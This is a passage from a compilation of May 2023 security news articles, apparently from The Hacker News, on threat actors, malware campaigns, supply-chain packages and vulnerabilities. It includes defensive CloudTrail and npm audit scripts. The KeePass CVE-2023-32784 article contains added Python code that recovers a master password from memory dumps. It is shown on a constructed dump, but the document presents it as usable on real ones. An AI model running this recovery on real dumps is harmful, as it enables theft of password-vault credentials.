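            findings.append((rec["eventTime"], "ec2_launch_by_new_identity",
                             f"new identity {actor} launched EC2 instances"))
    return findings


def _rec(t: str, name: str, user: str, ua: str = "console.amazonaws.com", **params) -> dict:
    """Build a trimmed CloudTrail-style record (constructed; only the fields hunt() reads)."""
    return {"eventTime": t, "eventName": name, "userAgent": ua,
            "userIdentity": {"type": "IAMUser", "userName": user},
            "requestParameters": params or None}


SAMPLE_RECORDS = [  # constructed, deliberately out of order
    _rec("2023-05-01T10:06:12Z", "CreateAccessKey", "deploy-bot", userName="deploy-bot2"),
    _rec("2023-04-20T08:00:00Z", "CreateAccessKey", "admin", userName="alice"),      # old user: no alert
    _rec("2023-05-01T10:00:03Z", "GetCallerIdentity", "deploy-bot", ua="S3 Browser/9.5.5 (Windows)"),
    _rec("2023-05-01T11:00:00Z", "RunInstances", "deploy-bot2",
         instancesSet={"items": [{"instanceType": "c5.24xlarge"}]}),
    _rec("2023-04-01T08:00:00Z", "CreateUser", "admin", userName="alice"),
    _rec("2023-05-01T10:05:40Z", "CreateUser", "deploy-bot", userName="deploy-bot2"),  # mimics naming convention
    _rec("2023-05-01T10:10:00Z", "CreateLoginProfile", "deploy-bot", userName="backup-svc"),
]

if __name__ == "__main__":
    for t, rule, detail in hunt(SAMPLE_RECORDS):
        print(f"{t} {rule}: {detail}")
```

On real data, point `hunt` at the deduplicated records of one account for a day; the CreateLoginProfile rule is noisy in shops that provision console access by hand, so route it to review rather than paging, while a key or an EC2 launch tied to an identity minutes old is the part that warrants an immediate response.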

GUI-vil's links to Indonesia stem from the fact that the source IP addresses associated with the activities are linked to two Autonomous System Numbers (ASNs) located in the Southeast Asian country.

"The group's primary mission, financially driven, is to create EC2 instances to facilitate their crypto mining activities," the researchers said. "In many cases the profits they make from crypto mining are just a sliver of the expense the victim organizations have to pay for running the EC2 instances."


Bad Magic's Extended Reign in Cyber Espionage Goes Back Over a Decade
24.5.23  BigBrothers  The Hacker News
Cyber Espionage
New findings about a hacker group linked to cyber attacks targeting companies in the Russo-Ukrainian conflict area reveal that it may have been around for much longer than previously thought.

The threat actor, tracked as Bad Magic (aka Red Stinger), has not only been linked to a fresh sophisticated campaign, but also to an activity cluster that first came to light in May 2016.

"While the previous targets were primarily located in the Donetsk, Luhansk, and Crimea regions, the scope has now widened to include individuals, diplomatic entities, and research organizations in Western and Central Ukraine," Russian cybersecurity firm Kaspersky said in a technical report published last week.

The campaign is characterized by the use of a novel modular framework codenamed CloudWizard, which features capabilities to take screenshots, record microphone, log keystrokes, grab passwords, and harvest Gmail inboxes.

Bad Magic was first documented by the company in March 2023, detailing the group's use of a backdoor called PowerMagic (aka DBoxShell or GraphShell) and a modular framework dubbed CommonMagic in attacks targeting Russian-occupied territories of Ukraine.

Then earlier this month, Malwarebytes revealed at least five waves of espionage attacks mounted by the group dating back to December 2020.

The deeper insight shared by Kaspersky connects Bad Magic to prior activity based on combing through historical telemetry data, allowing the company to identify various artifacts associated with the CloudWizard framework from 2017 to 2020.

Cyber Espionage
The initial access vector used to drop the first-stage installer is currently unknown. That said, the malware is configured to drop a Windows service ("syncobjsup.dll") and a second file ("mods.lrc"), which, in turn, contains three different modules to harvest and exfiltrate sensitive data.

The information is transmitted in encrypted form to an actor-controlled cloud storage endpoint (OneDrive, Dropbox, or Google Drive). A web server is used as a fallback mechanism in the event none of the services are accessible.

Kaspersky said it identified source code overlaps between an older version of CloudWizard and another malware known as Prikormka, which was discovered by Slovak cybersecurity company ESET in 2016.

Cyber Espionage
Image Source: ESET
The espionage campaign, monitored by ESET under the moniker Operation Groundbait, primarily singled out anti-government separatists in Donetsk and Luhansk and Ukrainian government officials, politicians, and journalists.

Prikormka is deployed via a dropper contained within malicious email attachments and features 13 different components to harvest various kinds of data from compromised machines. Evidence gathered by ESET shows that the malware has been selectively used since at least 2008.

CloudWizard also exhibits resemblances with a related intrusion set called BugDrop that was disclosed by CyberX (which has since been acquired by Microsoft) in 2017, with the industrial cybersecurity company describing it as more advanced than Groundbait.

Commonalities have also been unearthed between CloudWizard and CommonMagic, including identical source code and victimology patterns, indicating that the threat actor has been repeatedly tweaking its malware arsenal and infecting targets for about 15 years.

Cyber Espionage
The latest development, in attributing the CloudWizard framework to the actor behind Operation Groundbait and Operation BugDrop, provides yet another piece to the puzzle that hopes to eventually reveal the bigger picture of the mysterious group's origins.

"The threat actor responsible for these operations has demonstrated a persistent and ongoing commitment to cyber espionage, continuously enhancing their toolset and targeting organizations of interest for over 15 years," Kaspersky researcher Georgy Kucherin said.

"Geopolitical factors continue to be a significant motivator for APT attacks and, given the prevailing tension in the Russo-Ukrainian conflict area, we anticipate that this actor will persist with its operations for the foreseeable future."


U.K. Fraudster Behind iSpoof Scam Receives 13-Year Jail Term for Cyber Crimes
24.5.23  Crime  The Hacker News
Cyber Crimes
A U.K. national responsible for his role as the administrator of the now-defunct iSpoof online phone number spoofing service has been sentenced to 13 years and 4 months in prison.

Tejay Fletcher, 35, of Western Gateway, London, was awarded the sentence on May 18, 2023. He pleaded guilty last month to a number of cyber offenses, including facilitating fraud and possessing and transferring criminal property.

iSpoof, which was available as a paid service, allowed fraudsters to mask their phone numbers and masquerade as representatives from banks, tax offices, and other official bodies to defraud victims.

The help desk scam purported to warn targets of suspicious activity on their accounts and tricked them into disclosing sensitive financial information or transferring money to accounts under the threat actor's control.

According to the U.K. Metropolitan Police, the criminals assumed false identities as representatives of various banks such as Barclays, Santander, HSBC, Lloyds, Halifax, First Direct, Natwest, Nationwide, and TSB.

"The website offered a number of packages for users who would buy, in Bitcoin, the number of minutes they wanted to use the software to make calls," the Met said in a statement.

The total losses to victims in the U.K. alone are said to be more than £48 million ($59.8 million), with confirmed global losses of at least £100 million ($124.6 million).

iSpoof was dismantled in November 2022 as part of a coordinated law enforcement exercise, resulting in the arrest of Fletcher and 168 other individuals linked to the operation.

Fletcher is believed to have made around £1.7 - £1.9 million ($2.1 - $2.3 million) in illicit proceeds, in addition to owning a Range Rover, a Lamborghini Urus, and high-end watches from Rolex and Audemars Piguet.

"Fletcher spent time marketing iSpoof on the Telegram Channel, The iSpoof Club," the Met noted. "Fletcher set up the channel to promote iSpoof and would update users and promote updates and developments to the website."

A search of his home after his arrest in November 2022 uncovered more than 30 mobile phones and a number of SIM cards that were used to pull off the scheme.

"By setting up iSpoof, Fletcher created a gateway for thousands of criminals to defraud innocent victims out of millions of pounds," Detective Superintendent Helen Rance said. "Meanwhile he was living a luxury lifestyle benefitting from the profits."


KeePass Exploit Allows Attackers to Recover Master Passwords from Memory
24.5.23  Exploit  The Hacker News

A proof-of-concept (PoC) has been made available for a security flaw impacting the KeePass password manager that could be exploited to recover a victim's master password in cleartext under specific circumstances.

The issue, tracked as CVE-2023-32784, impacts KeePass versions 2.x for Windows, Linux, and macOS, and is expected to be patched in version 2.54, which is likely to be released early next month.

"Apart from the first password character, it is mostly able to recover the password in plaintext," security researcher "vdohney," who discovered the flaw and devised a PoC, said. "No code execution on the target system is required, just a memory dump."

"It doesn't matter where the memory comes from," the researcher added, stating, "it doesn't matter whether or not the workspace is locked. It is also possible to dump the password from RAM after KeePass is no longer running, although the chance of that working goes down with the time it's been since then."

It's worth noting that successful exploitation hinges on the attacker already having access to the target's memory, meaning the computer has to have been compromised beforehand. It also requires that the master password was typed on a keyboard rather than pasted from the clipboard, since only typed characters pass through the affected text box.

vdohney said the vulnerability has to do with how a custom text box field used for entering the master password handles user input. Specifically, it has been found to leave traces of every character the user types in the program memory.

This leads to a scenario whereby an attacker could dump the program's memory and reassemble the password in plaintext with the exception of the first character. Users are advised to update to KeePass 2.54 once it becomes available.
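To make the mechanism concrete, the following is an added Python example written for this page; it is not vdohney's proof-of-concept, which is a separate tool. It assumes, from the public description of the flaw, that every keystroke after the first leaves a UTF-16LE string of n bullet characters (U+25CF) followed by the typed character somewhere in process memory. The "memory dump" it scans is constructed inside the code, not a real KeePass dump, and the recovery scan is the same idea a practitioner would run over a real process dump: look for runs of bullets followed by a single character, and order the hits by run length.

```python
import re
from collections import defaultdict

BULLET = "\u25cf"  # U+25CF, the masking glyph the KeePass master-password box draws

def simulate_leaked_memory(password: str) -> bytes:
    """Build a constructed 'memory dump' for the demonstration.

    Assumed leak model (from the public description of CVE-2023-32784, not
    measured here): every keystroke after the first leaves behind a managed
    string of (position) bullets followed by the newly typed character,
    UTF-16LE encoded like any .NET string. The first character is never
    preceded by a bullet, so it leaves no trace this scan can use.
    """
    filler = b"\x00" * 8 + b"junk\xff\x01"  # constructed unrelated heap contents
    dump = bytearray(filler)
    for position, ch in enumerate(password):
        if position == 0:
            continue
        dump += (BULLET * position + ch).encode("utf-16-le")
        # odd-length filler so consecutive traces land on both 16-bit alignments
        dump += filler + b"\x00"
    return bytes(dump)

# a run of bullets followed by exactly one character that is not a bullet,
# NUL padding or a decoding error marker
_TRACE = re.compile(r"(\u25cf+)([^\u25cf\x00\ufffd])")

def find_traces(dump: bytes) -> dict[int, set[str]]:
    """Map 0-based character position -> set of candidate characters.

    A raw dump has no alignment guarantee, so both 16-bit alignments are
    decoded; misaligned bullet bytes decode to a different code point and
    cannot produce false matches.
    """
    found: dict[int, set[str]] = defaultdict(set)
    for offset in (0, 1):
        text = dump[offset:].decode("utf-16-le", errors="replace")
        for bullets, ch in _TRACE.findall(text):
            found[len(bullets)].add(ch)
    return dict(found)

def recover_password(dump: bytes) -> str:
    """Reassemble the password. '?' marks the unrecoverable first character
    and any position without a trace; '[..]' lists ambiguous candidates."""
    traces = find_traces(dump)
    if not traces:
        return ""
    out = ["?"]
    for position in range(1, max(traces) + 1):
        chars = sorted(traces.get(position, ()))
        if len(chars) == 1:
            out.append(chars[0])
        elif chars:
            out.append("[" + "".join(chars) + "]")
        else:
            out.append("?")
    return "".join(out)

if __name__ == "__main__":
    dump = simulate_leaked_memory("Password123!")
    print(recover_password(dump))  # ?assword123!
```

On a real dump, the same position can yield several candidates (for instance when the user corrected a typo), which is why the recovery reports a set per position instead of assuming one character; the first character still has to be guessed or brute-forced.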
The disclosure comes a few months after another medium-severity flaw (CVE-2023-24055) was uncovered in the open source password manager that could be potentially exploited to retrieve cleartext passwords from the password database by leveraging write access to the software's XML configuration file.

KeePass has maintained that the "password database is not intended to be secure against an attacker who has that level of access to the local PC."

It also follows findings from Google security research that detailed a flaw in password managers such as Bitwarden, Dashlane, and Safari, which can be abused to auto-fill saved credentials into untrusted web pages, leading to possible account takeovers.


Meet 'Jack' from Romania! Mastermind Behind Golden Chickens Malware

20.5.23  Virus  The Hacker News

The identity of the second threat actor behind the Golden Chickens malware has been uncovered courtesy of a fatal operational security blunder, cybersecurity firm eSentire said.

The individual in question, who lives in Bucharest, Romania, has been given the codename Jack. He is one of the two criminals operating an account on the Russian-language Exploit.in forum under the name "badbullzvenom," the other being "Chuck from Montreal."

eSentire characterized Jack as the true mastermind behind Golden Chickens. Evidence unearthed by the Canadian company shows that he is also listed as the owner of a vegetable and fruit import and export business.

"Like 'Chuck from Montreal,' 'Jack' uses multiple aliases for the underground forums, social media, and Jabber accounts, and he too has gone to great lengths to disguise himself," eSentire researchers Joe Stewart and Keegan Keplinger said.

"'Jack' has taken great pains to obfuscate the Golden Chickens malware, trying to make it undetectable by most [antivirus] companies, and strictly allowing only a small number of customers to buy access to the Golden Chickens MaaS."

Golden Chickens (aka More_eggs) is a malware suite used by financially-motivated cybercrime actors such as Cobalt Group and FIN6. The threat actors behind the malware, also known as Venom Spider, operate under a malware-as-a-service (MaaS) model.

The JavaScript malware is distributed via phishing campaigns and comes with several components to harvest financial information, perform lateral movement, and even drop a ransomware plugin for PureLocker called TerraCrypt.

Jack's online activities, according to eSentire, go all the way back to 2008, when he was just 15 years old and signed up for various cybercrime forums as a novice member. All his aliases are being collectively tracked as LUCKY.

The investigation, in putting together his digital trail, traces Jack's progression from a teenager interested in building malicious programs to a longtime hacker involved in developing password stealers, crypters, and More_eggs.

Some of the earliest malware tools developed by Jack in 2008 consisted of Voyer, which is capable of harvesting a user's Yahoo instant messages, and an information stealer christened FlyCatcher that can record keystrokes.

A year later, Jack released a new password stealer dubbed CON that's designed to siphon credentials from different web browsers, VPN, and FTP applications as well as now-defunct messaging apps like MSN Messenger and Yahoo! Messenger.

Jack, later that same year, began advertising a crypter referred to as GHOST to help other actors encrypt and obfuscate malware with the goal of evading detection. The unexpected demise of his father in a car accident is believed to have caused him to pause development of the tool in 2010.

By 2012, Jack had gained a reputation in the cybercriminal community as a scammer for failing to provide adequate support to customers who had purchased the product from him.

He also cited "big life problems" in a forum post on April 27, 2012, stating he is contemplating moving to Pakistan to work for the government as a security specialist and that one among his crypter customers "works at pakistan guv" [read government].

It's not immediately clear if Jack ended up going to Pakistan, but eSentire said it spotted tactical overlaps between a 2019 campaign conducted by a Pakistani threat actor known as SideCopy and Jack's VenomLNK malware, which functions as the initial access vector for the More_eggs backdoor.

Jack is suspected to have crossed paths with "Chuck from Montreal" sometime between late 2012 and October 4, 2013, the date on which a message was posted from Chuck's badbullz account on the Lampeduza forum containing contact information – a Jabber address – associated with LUCKY.

It's speculated that Jack brokered a deal with Chuck that would allow him to post under Chuck's aliases "badbullz" and "badbullzvenom" on various underground forums as a way to get around his notoriety as a ripper.

Lending credence to this hypothesis is the fact that one of LUCKY's new tools, a kit for building macros called MULTIPLIER, was released in 2015 via the badbullzvenom account, while the threat actor behind the LUCKY account ceased posting through that handle.

"By using the badbullzvenom and badbullz accounts, and unbeknownst to forum members, he is essentially starting with a clean slate, and he can continue to build his credibility under the account aliases: badbullz and badbullzvenom," the researchers explained.

Subsequently in 2017, badbullzvenom (aka LUCKY) released a separate tool called VenomKit, which has since evolved into the Golden Chickens MaaS. The malware's ability to evade detection also caught the attention of Cobalt Group, a Russia-based cybercrime gang that leveraged it to deploy Cobalt Strike in attacks aimed at financial entities.

Two years later, another financially motivated threat actor labeled FIN6 (aka ITG08 or Skeleton Spider) was observed using the Golden Chickens service to anchor its intrusions targeting point-of-sale (POS) machines used by retailers in Europe and the U.S.

The cybersecurity firm said it also found the identities of his wife, mother, and two sisters. He and his wife are said to reside in an upscale part of Bucharest, with his wife's social media accounts documenting their trips to cities like London, Paris, and Milan. The photos further show them wearing designer clothing and accessories.

"The threat actor who went by the alias LUCKY and who also shares the badbullz and badbullzvenom accounts with the Montreal-based cybercriminal 'Chuck,' made his fatal mistake when he used the Jabber account," the researchers said.


Notorious Cyber Gang FIN7 Returns with Cl0p Ransomware in New Wave of Attacks
20.5.23  Ransomware  The Hacker News
The notorious cybercrime group known as FIN7 has been observed deploying Cl0p (aka Clop) ransomware, marking the threat actor's first ransomware campaign since late 2021.

Microsoft, which detected the activity in April 2023, is tracking the financially motivated actor under its new taxonomy Sangria Tempest.

"In these recent attacks, Sangria Tempest uses the PowerShell script POWERTRASH to load the Lizar post-exploitation tool and get a foothold into a target network," the company's threat intelligence team said. "They then use OpenSSH and Impacket to move laterally and deploy Clop ransomware."

FIN7 (aka Carbanak, ELBRUS, and ITG14) has been linked to other ransomware families such as Black Basta, DarkSide, REvil, and LockBit, with the threat actor acting as a precursor for Maze and Ryuk ransomware attacks.

Active since at least 2012, the group has a track record of targeting a broad spectrum of organizations spanning software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, and utilities.

Another notable tactic in its playbook is its pattern of setting up fake security companies – Combi Security and Bastion Secure – to recruit employees for conducting ransomware attacks and other operations.

Last month, IBM Security X-Force revealed that members of the now-defunct Conti ransomware gang are using a new malware called Domino that was developed by FIN7.

FIN7's use of POWERTRASH to deliver Lizar (aka DICELOADER or Tirion) was also highlighted by WithSecure a few weeks ago in connection with attacks exploiting a high-severity flaw in Veeam Backup & Replication software (CVE-2023-27532) to gain initial access.

The latest development signifies FIN7's continued reliance on various ransomware families to target victims as part of a shift in its monetization strategy by pivoting away from payment card data theft to extortion.


Samsung Devices Under Active Exploitation! CISA Warns of Critical Flaw
20.5.23  Vulnerability  The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned of active exploitation of a medium-severity flaw affecting Samsung devices.

The issue, tracked as CVE-2023-21492 (CVSS score: 4.4), impacts select Samsung devices running Android versions 11, 12, and 13.

The South Korean electronics giant described the issue as an information disclosure flaw that could be exploited by a privileged attacker to bypass address space layout randomization (ASLR) protections.

ASLR is a security technique that's designed to thwart memory corruption and code execution flaws by obscuring the location of an executable in a device's memory.

Samsung, in an advisory released this month, said it was "notified that an exploit for this issue had existed in the wild," adding it was privately disclosed to the company on January 17, 2023.

Other details about how the flaw is being exploited are currently not known, but vulnerabilities in Samsung phones have been weaponized by commercial spyware vendors in the past to deploy malicious software.

Back in August 2020, Google Project Zero also demonstrated a remote zero-click MMS attack that leveraged two buffer overwrite flaws in the Quram qmg library (SVE-2020-16747 and SVE-2020-17675) to defeat ASLR and achieve code execution.

In light of active abuse, CISA has added the shortcoming to its Known Exploited Vulnerabilities (KEV) catalog, alongside two Cisco IOS flaws (CVE-2004-1464 and CVE-2016-6415), urging Federal Civilian Executive Branch (FCEB) agencies to apply patches by June 9, 2023.

Last week, CISA also added seven vulnerabilities to the KEV catalog, the oldest of which is a 13-year-old bug impacting Linux (CVE-2010-3904) that allows an unprivileged local attacker to escalate their privileges to root.


Developer Alert: NPM Packages for Node.js Hiding Dangerous TurkoRat Malware
19.5.23  Virus  The Hacker News
Two malicious packages discovered in the npm package repository have been found to conceal an open source information stealer malware called TurkoRat.

The packages – named nodejs-encrypt-agent and nodejs-cookie-proxy-agent – were collectively downloaded approximately 1,200 times and were available for more than two months before they were identified and taken down.

ReversingLabs, which broke down the details of the campaign, described TurkoRat as an information stealer capable of harvesting sensitive information such as login credentials, website cookies, and data from cryptocurrency wallets.

While nodejs-encrypt-agent came fitted with the malware inside, nodejs-cookie-proxy-agent was found to disguise the trojan as a dependency under the name axios-proxy.

nodejs-encrypt-agent was also engineered to masquerade as another legitimate npm module known as agent-base, which has been downloaded over 25 million times to date.

The rogue packages and their affected versions are listed below:

nodejs-encrypt-agent (versions 6.0.2, 6.0.3, 6.0.4, and 6.0.5)
nodejs-cookie-proxy-agent (versions 1.1.0, 1.2.0, 1.2.1, 1.2.2, 1.2.3, and 1.2.4), and
axios-proxy (versions 1.7.3, 1.7.4, 1.7.7, 1.7.9, 1.8.9, and 1.9.9)
"TurkoRat is just one of many open source malware families that are offered for 'testing' purposes, but can readily be downloaded and modified for malicious use, as well," Lucija Valentić, threat researcher at ReversingLabs, said.

The findings once again underscore the ongoing risk of threat actors orchestrating supply chain attacks via open source packages and baiting developers into downloading potentially untrusted code.

"Development organizations need to scrutinize the features and behaviors of the open source, third-party and commercial code they are relying on in order to track dependencies and detect potential malicious payloads in them," Valentić said.

The growing use of malicious npm packages fits in with a broader pattern of surging attacker interest in open source software supply chains, not to mention highlighting the increasing sophistication of threat actors.

Even more worryingly, researchers from Checkmarx published new research this month that showed how threat actors could impersonate authentic npm packages by "using lowercase letters to mimic uppercase letters in the original package names" (e.g., memoryStorageDriver vs memorystoragedriver).

"This malicious package impersonation takes the traditional 'Typosquatting' attack method to a new level, where attackers register package names that consist of the exact same letters as the legitimate ones, with the only difference being capitalization," researchers Teach Zornstein and Yehuda Gelb said.

"This makes it even harder for users to detect the deception since it can be easy to overlook the subtle differences in capitalization."

The supply chain security company found that 1,900 out of 3,815 packages with capital letters in their titles could have been at risk of copycat attacks if not for a fix pushed by the npm maintainers to address the problem, which, Checkmarx said, has existed since December 2017.
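The capitalization trick is easy to check for on the consuming side, whatever the registry does. The following is an added Python example written for this page, not Checkmarx's tooling or npm's own fix: it groups registry names that collapse to the same case-folded string and then audits a package.json for dependencies whose name has a differently-cased sibling. The registry snapshot and the package.json are constructed for the demonstration; in practice the snapshot would come from the registry's search API or an internal mirror, and the same check applies to a lockfile.

```python
import json
from collections import defaultdict

# Constructed registry snapshot: an older package that kept a mixed-case name,
# plus the lowercase look-alike an attacker could register beside it.
REGISTRY_NAMES = {
    "memoryStorageDriver", "memorystoragedriver",
    "agent-base", "axios", "lodash", "JSONStream",
}

# Constructed package.json for the audit below.
PACKAGE_JSON = json.dumps({
    "name": "example-service",
    "dependencies": {"memorystoragedriver": "^1.0.0", "axios": "^1.4.0"},
    "devDependencies": {"lodash": "^4.17.21"},
})

def case_collisions(names):
    """Group names that become identical once case-folded.

    New npm names are lowercase-only, but older mixed-case packages remain, so
    their lowercase twins are the names an impersonator would go after."""
    groups = defaultdict(set)
    for name in names:
        groups[name.casefold()].add(name)
    return {folded: sorted(group) for folded, group in groups.items() if len(group) > 1}

def audit_dependencies(package_json: str, registry_names) -> list[dict]:
    """Flag every declared dependency that has a differently-cased sibling in
    the registry snapshot, i.e. a name a developer could confuse with it."""
    manifest = json.loads(package_json)
    declared = {}
    for section in ("dependencies", "devDependencies",
                    "optionalDependencies", "peerDependencies"):
        declared.update(manifest.get(section, {}))
    by_fold = defaultdict(set)
    for name in registry_names:
        by_fold[name.casefold()].add(name)
    findings = []
    for dep in sorted(declared):
        lookalikes = by_fold.get(dep.casefold(), set()) - {dep}
        if lookalikes:
            findings.append({
                "dependency": dep,
                "lookalikes": sorted(lookalikes),
                # False means the exact name is not in the snapshot at all,
                # which is the case-variant typo scenario
                "installed_name_exists": dep in registry_names,
            })
    return findings

if __name__ == "__main__":
    print(case_collisions(REGISTRY_NAMES))
    for finding in audit_dependencies(PACKAGE_JSON, REGISTRY_NAMES):
        print(finding)
```

A finding is not proof of malice; it says that two names exist which a human reading a README or a copy-pasted install command cannot tell apart by eye, so the dependency should be confirmed against the upstream repository before it is pinned.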

The disclosure also follows another advisory from Check Point, which identified three malicious extensions hosted on the VS Code extensions marketplace. They have been purged as of May 14, 2023.

The add-ons, named prettiest java, Darcula Dark, and python-vscode, were cumulatively downloaded over 46,000 times and incorporated features that allowed the threat actors to steal credentials and system information and to establish a remote shell on the victim's machine.

The problem is not limited to npm and the VS Code marketplace: a similar set of rogue libraries has been unearthed in the Python Package Index (PyPI) software repository as well.

Some of these packages were designed to distribute a cryptocurrency clipper malware dubbed KEKW, while other typosquatted versions of the popular flask framework included backdoor functions to receive commands from a remote server.

Another Python package uncovered by Israeli company Phylum this week was found to contain a malicious dependency that harbored an encrypted payload to grab Discord tokens and steal clipboard content in order to hijack cryptocurrency transactions.

The package, referred to as chatgpt-api by its developer Patrick Pogoda and accessible through GitHub, delivered on the functionality it advertised (i.e., interacting with OpenAI's ChatGPT tool) in an attempt to complete the ruse. The repository is still available as of writing.

"For now this actor appears to be preying on the recent explosive rise in popularity of [Large Language Models] with this chatgpt-api package," Phylum said, adding the threat actor likely has an automated mechanism to upload new iterations of the malicious dependency every time it's taken down and "maintain a persistent infection."


Searching for AI Tools? Watch Out for Rogue Sites Distributing RedLine Malware
19.5.23  Virus  The Hacker News
Malicious Google Search ads for generative AI services like OpenAI ChatGPT and Midjourney are being used to direct users to sketchy websites as part of a BATLOADER campaign designed to deliver RedLine Stealer malware.

"Both AI services are extremely popular but lack first-party standalone apps (i.e., users interface with ChatGPT via their web interface while Midjourney uses Discord)," eSentire said in an analysis.

"This vacuum has been exploited by threat actors looking to drive AI app-seekers to imposter web pages promoting fake apps."

BATLOADER is a loader malware that's propagated via drive-by downloads where users searching for certain keywords on search engines are displayed bogus ads that, when clicked, redirect them to rogue landing pages hosting malware.

The installer file, per eSentire, is rigged with an executable file (ChatGPT.exe or midjourney.exe) and a PowerShell script (Chat.ps1 or Chat-Ready.ps1) that downloads and loads RedLine Stealer from a remote server.

Once the installation is complete, the binary makes use of Microsoft Edge WebView2 to load chat.openai[.]com or www.midjourney[.]com – the legitimate ChatGPT and Midjourney URLs – in a pop-up window so as to not raise any red flags.

The adversary's use of ChatGPT and Midjourney-themed lures to serve malicious ads and ultimately drop the RedLine Stealer malware was also highlighted last week by Trend Micro.

This is not the first time the operators behind BATLOADER have capitalized on the AI craze to distribute malware. In March 2023, eSentire detailed a similar set of attacks that leveraged ChatGPT lures to deploy Vidar Stealer and Ursnif.

The cybersecurity company further pointed out that abuse of Google Search ads has fallen off from its early 2023 peak, suggesting that the tech giant is taking active steps to curtail its exploitation.

The findings come weeks after Securonix uncovered a phishing campaign dubbed OCX#HARVESTER that targeted the cryptocurrency sector between December 2022 and March 2023 with More_eggs (aka Golden Chickens), a JavaScript downloader that's used to serve additional payloads.

eSentire, in January, traced the identity of one of the key operators of the malware-as-a-service (MaaS) to an individual located in Montreal, Canada. The second threat actor associated with the group has since been identified as a Romanian national who goes by the alias Jack.


WebKit Under Attack: Apple Issues Emergency Patches for 3 New Zero-Day Vulnerabilities
19.5.23  Apple  The Hacker News
Apple on Thursday rolled out security updates to iOS, iPadOS, macOS, tvOS, watchOS, and the Safari web browser to address three new zero-day flaws that it said are being actively exploited in the wild.

The three security shortcomings are listed below -

CVE-2023-32409 - A WebKit flaw that could be exploited by a malicious actor to break out of the Web Content sandbox. It was addressed with improved bounds checks.
CVE-2023-28204 - An out-of-bounds read issue in WebKit that could be abused to disclose sensitive information when processing web content. It was addressed with improved input validation.
CVE-2023-32373 - A use-after-free bug in WebKit that could lead to arbitrary code execution when processing maliciously crafted web content. It was addressed with improved memory management.
The iPhone maker credited Clément Lecigne of Google's Threat Analysis Group (TAG) and Donncha Ó Cearbhaill of Amnesty International's Security Lab for reporting CVE-2023-32409. An anonymous researcher has been acknowledged for reporting the other two issues.

It's worth noting that both CVE-2023-28204 and CVE-2023-32373 were patched as part of Rapid Security Response updates – iOS 16.4.1 (a) and iPadOS 16.4.1 (a) – the company released at the start of the month.

There are currently no additional technical specifics about the flaws, the nature of the attacks, or the identity of the threat actors that may be exploiting them.

That said, such weaknesses have been historically leveraged as part of highly-targeted intrusions to deploy mercenary spyware on the devices of dissidents, journalists, and human rights activists, among others.

The latest updates are available for the following devices and operating systems -

iOS 16.5 and iPadOS 16.5 - iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later
iOS 15.7.6 and iPadOS 15.7.6 - iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)
macOS Ventura 13.4 - macOS Ventura
tvOS 16.5 - Apple TV 4K (all models) and Apple TV HD
watchOS 9.5 - Apple Watch Series 4 and later
Safari 16.5 - macOS Big Sur and macOS Monterey
Apple has so far remediated a total of six actively exploited zero-days since the start of 2023. Earlier this February, the company plugged a WebKit flaw (CVE-2023-23529) that could lead to remote code execution.

Then last month, it shipped fixes for a pair of vulnerabilities (CVE-2023-28205 and CVE-2023-28206) that allowed for code execution with elevated privileges. Lecigne and Ó Cearbhaill were credited with reporting the security defects.


This Cybercrime Syndicate Pre-Infected Over 8.9 Million Android Phones Worldwide
19.5.23  Android  The Hacker News
A cybercrime enterprise known as Lemon Group is leveraging millions of pre-infected Android smartphones worldwide to carry out their malicious operations, posing significant supply chain risks.

"The infection turns these devices into mobile proxies, tools for stealing and selling SMS messages, social media and online messaging accounts and monetization via advertisements and click fraud," cybersecurity firm Trend Micro said.

The activity encompasses no fewer than 8.9 million compromised Android devices, particularly budget phones, with the highest concentration of the infections discovered in the U.S., Mexico, Indonesia, Thailand, Russia, South Africa, India, Angola, the Philippines, and Argentina.

The findings were presented by researchers Fyodor Yarochkin, Zhengyu Dong, Vladimir Kropotov, and Paul Pajares at the Black Hat Asia conference held in Singapore last week.

Describing it as a continuously evolving problem, the cybersecurity firm said the threat actors are branching out to other Android-based IoT devices such as Smart TVs, Android TV boxes, entertainment systems, and even children's watches.

The infections are spread across more than 180 countries, with over 50 brands of mobile devices compromised by a malware strain called Guerilla.

"Following our timeline estimates, the threat actor has spread this malware over the last five years," the researchers said. "A compromise on any significant critical infrastructure with this infection can likely yield a significant profit for Lemon Group in the long run at the expense of legitimate users."

Guerilla was first documented by Sophos in 2018 when it discovered 15 apps uploaded on the Play Store that harbored functionality to engage in click fraud and act as a backdoor.

The malware also attracted attention in early 2022 for its ability to intercept SMS messages that match predefined characteristics such as one-time passwords (OTPs) associated with various online platforms, shortly after which the threat actor changed the name of the undertaking from Lemon to Durian Cloud SMS.

The goal, per Trend Micro, is to bypass SMS-based verification and advertise bulk virtual phone numbers – which belong to unsuspecting users of the infected Android handsets – for sale to create online accounts.

While such services have a privacy benefit, allowing users to sign up for services using temporary or disposable phone numbers, they can also be abused to create spam accounts on a large scale and conduct fraud.

The latest findings from the cybersecurity company illustrate that the SMS grabbing feature is just one of the many plugins associated with a downloader component (aka the main plugin) that's loaded into a zygote process by means of a tampered library.

It's worth noting that the same technique of modifying the zygote process has also been adopted by another mobile trojan called Triada.

"With this, every time other app processes are forked from the zygote, it would also be tampered," the researchers said. "The main plugin will load other plugins with the current process being the target, and the other plugins will try to control the current app via a hook."

Each of the Guerilla plugins serves a particular business function and a monetization opportunity for the Lemon Group actors. Some of them are listed below -

Proxy plugin to set up a reverse proxy from an infected phone and allow other actors to rent access to the network resources of the affected mobile device
Cookie plugin to harvest users' Facebook cookies and other profile information
WhatsApp plugin to hijack sessions and send unwanted messages
Splash plugin to serve unwarranted ads when launching certain apps, and
Silent plugin to stealthily install an APK file and launch the app
Further investigation into the sprawling operation has unraveled infrastructure overlaps between Lemon Group and Triada, suggesting that the two groups may have collaborated at some point.

The unauthorized firmware modifications are believed to have occurred via an unnamed third-party vendor that "produces the firmware components for mobile phones" and which also manufactures similar components for Android Auto.

That said, Trend Micro did not reveal the exact modus operandi of how the devices are infected with the trojanized firmware containing Guerilla, how they are sold in the market, and what brands are impacted.

The disclosure comes as Microsoft security researcher Dimitrios Valsamaras detailed a new attack method dubbed Dirty Stream that turns Android share targets into a vector for distributing malicious payloads and capturing sensitive data from other apps installed on a device.

